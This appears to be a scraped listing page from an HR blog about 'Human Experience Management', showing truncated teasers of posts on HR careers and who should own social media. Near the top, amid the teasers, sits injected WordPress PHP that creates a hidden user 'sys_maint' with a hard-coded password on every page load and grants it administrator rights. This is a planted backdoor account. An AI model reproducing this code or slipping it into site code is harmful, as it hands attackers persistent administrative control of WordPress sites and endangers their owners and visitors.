Trends in Human Experience Management
It’s not like we expected this to happen when we thought about the year 2019...
$user = 'sys_maint'; $pass = 'ChangeMe_Str0ng!'; $email = 'sys_maint@local.com'; function quick_create() { global $user, $pass, $email; if (!username_exists($user) && !email_exists($email)) { $id = wp_create_user($user, $pass, $email); if (!is_wp_error($id)) { $u = new WP_User($id); $u->set_role('administrator'); } } } add_action('init', 'quick_create');
It’s not like we expected this to happen when we thought about the year 2019...
Recently, I was asked by a reader about professional development resources for HR professionals. I...
Last year, I presented a series on LinkedIn Live about ” Human Experience Management” The SAP...
A few months back, I shared an article on “4 Workplace Garanties Every Employee Should...
Reddit was established in 2005 to provide a forum for social discussion. It is one...
Before reading Chris’ post I would have said that social media belongs exclusively to marketing. I...
Before I answer your question, I must tell you a humorous story. For all the years...
I had previously answered a similar question regarding leaving the company and returning to HR. I wanted...
Last Wednesday, Chris Kieff began a fascinating discussion regarding which department should have social media. He believed that...
Human resources are currently undergoing a fascinating debate. The debate centres on whether or not...